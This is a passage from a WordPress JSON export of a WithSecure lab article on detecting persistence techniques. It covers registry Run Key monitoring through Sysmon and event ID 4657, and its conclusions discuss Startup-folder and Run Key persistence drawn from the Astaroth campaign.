we can then check the image that performed the action and the &quot;TargetObject&quot; to see if the command was pointing to a Run Key, for example. And just like with Sysmon, events in the Windows Security Log with an EID 4657 (A registry value was modified) also bring up the same type of actions, so we can use the same approach to develop monitoring capabilities over registry modifications.<\/p>\n<p>If we are correctly logging and parsing the whole command, we can also check if there is any file extension in the arguments, and again compare it to a list of usual suspects (executables) to further filter out false positives and create a more efficient detection rule.<\/p>\n<h2>Conclusions<\/h2>\n<p>As in the previous lab, we&#x27;ve had the chance to execute and detect real world techniques presented in an easy to digest format. In the case of this second lab, the focus was on techniques that allow and attacker to achieve persistence in a system, and to do so we once more picked examples from the Astaroth malware campaign.<\/p>\n<p>We looked at one of simplest techniques out there: copying a payload into the user&#x27;s Startup folder. We then stepped into another simple but widely used technique, modifying Run Keys or certain registry locations to achieve persistence between boot ups. We explored detection mechanisms that exist to counter these threats, gaining a better understanding of them and ways to implement them.<\/p>\n<p>We hope this guide has provided a little more insight into persistence and put you in the way to attain a deeper knowledge on the topic. And of course, try the labs if you have not done so yet!<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-2\/&#038;title=Attack%20Detection%20Fundamentals:%20Code%20Execution%20and%20Persistence%20&#8211;%20Lab%20#2\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Linkedin\u3067\u5171\u6709\u3059\u308b\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Code Execution and Persistence &#8211; Lab #2&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-2\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"\u30c4\u30a4\u30c3\u30bf\u30fc\u3067\u5171\u6709\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                        <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-cta-banner edwp-block js-wp-block-cta-banner wp-block-cta-banner--style-icon wp-block-cta-banner--no-image layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cta-banner__container\">\n        <div class=\"wp-block-cta-banner__box row-load\">\n            <div class=\"wp-component-content wp-component-content--help-text wp-component-content--dark wp-block-cta-banner__content\">\n                        <div class=\"wp-component-content__inner\">\n                <h2 class=\"wp-component-heading text--h2 wp-component-heading--dark wp-component-content__title\">\n    What <span class=\"blue-text\">next?<\/span><\/h2>                                    <div class=\"wp-component-content__content wysiwyg wysiwyg--dark\">\n                        <div class=\"wp-component-paragraph wp-component-paragraph--dark\">\n    <p class=\"text--p-medium\">Discover WithSecure\u2122 Elements Exposure Management.<br \/>\n&#8211; No credit card required. No obligations.No complexity.<\/p>\n<\/div>\n                    <\/div>\n                            <\/div>\n                            <div class=\"wp-component-content__buttons\">\n                <a class=\"wp-component-button btn btn--primary btn--dark\" href=\"https:\/\/www.withsecure.com\/en\/contact-us\/\">Contact us<\/a>            <\/div>\n                <\/div>                    <\/div>\n    <\/div>\n<\/section>\n\n\n\n\n<section\n    class=\"wp-block-cards edwp-block wp-block-cards--col-3 js-wp-block-cards wp-block-cards--show-overflow wp-block-cards--auto-slides-per-view layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cards__container\">\n        <div class=\"wp-component-content wp-component-content--default wp-block-cards__content\">\n            <h2 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Related <span class=\"blue-text\">Labs content<\/span><\/h2>                    <div class=\"wp-component-content__inner\">\n                                    <div class=\"wp-component-content__content wysiwyg\">\n                        <div class=\"wp-component-paragraph \">\n    <p class=\"text--p-medium\"><span data-teams=\"true\">Find related content relating to this topic.<\/span><\/p>\n<\/div>\n                    <\/div>\n                                                            <\/div>\n                <\/div>                            <div\n                class=\"swiper wp-block-cards__swiper js-wp-block-cards-swiper\"\n                data-slides-per-view-desktop=\"auto\"\n                data-slides-per-view-tablet=\"auto\"\n                data-slides-per-view-mobile=\"auto\"\n            >\n                <div class=\"swiper-wrapper wp-block-cards__swiper-wrapper row-load\">\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">DarkGate Rises: New version of DarkGate malware hunts like a Duck but bites like a RAT<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Source: https:\/\/labs.withsecure.com\/publications\/darkgate-rises<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/darkgate-rises\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Reverse engineering a Lumma infection<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Lumma is an information stealer that the WithSecure Detection and Response Team (DRT) have encountered several times. It has seen wider use over the past couple of years, and makes for an interesting threat to monitor.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/reverse-engineering-a-lumma-infection\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">AI security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Machine learning-driven malware analysis<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">With the rapid emergence of new malware variants, accurately classifying and attributing malware samples has become more challenging than ever<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/machine-learning-driven-malware-analysis\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                    <\/div>\n                <div class=\"wp-block-cards__nav fade-in\">\n                    <div class=\"wp-block-cards__pagination js-wp-block-cards-pagination\">\n                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-prev\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>In this final lab, we are going to deal with Persistence, again grabbing inspiration from TTPs the real-world threat Astaroth used in its latest campaign<\/p>\n","protected":false},"author":3,"featured_media":0,"template":"","categories":[314,315,316],"labs_content_type":[317],"class_list":["post-10579","lab_item","type-lab_item","status-publish","hentry","category-attack-detection","category-software-protection","category-threat-intelligence"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg 618w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-300x214.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-447x318.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-205x146.jpg 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals: Code Execution and Persistence &#8211; Lab #2<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">In this final lab, we are going to deal with Persistence, again grabbing inspiration from TTPs the real-world threat Astaroth used in its latest campaign<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-2\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            <\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/lab_item\/10579","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/users\/3"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/media?parent=10579"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/categories?post=10579"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/labs_content_type?post=10579"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}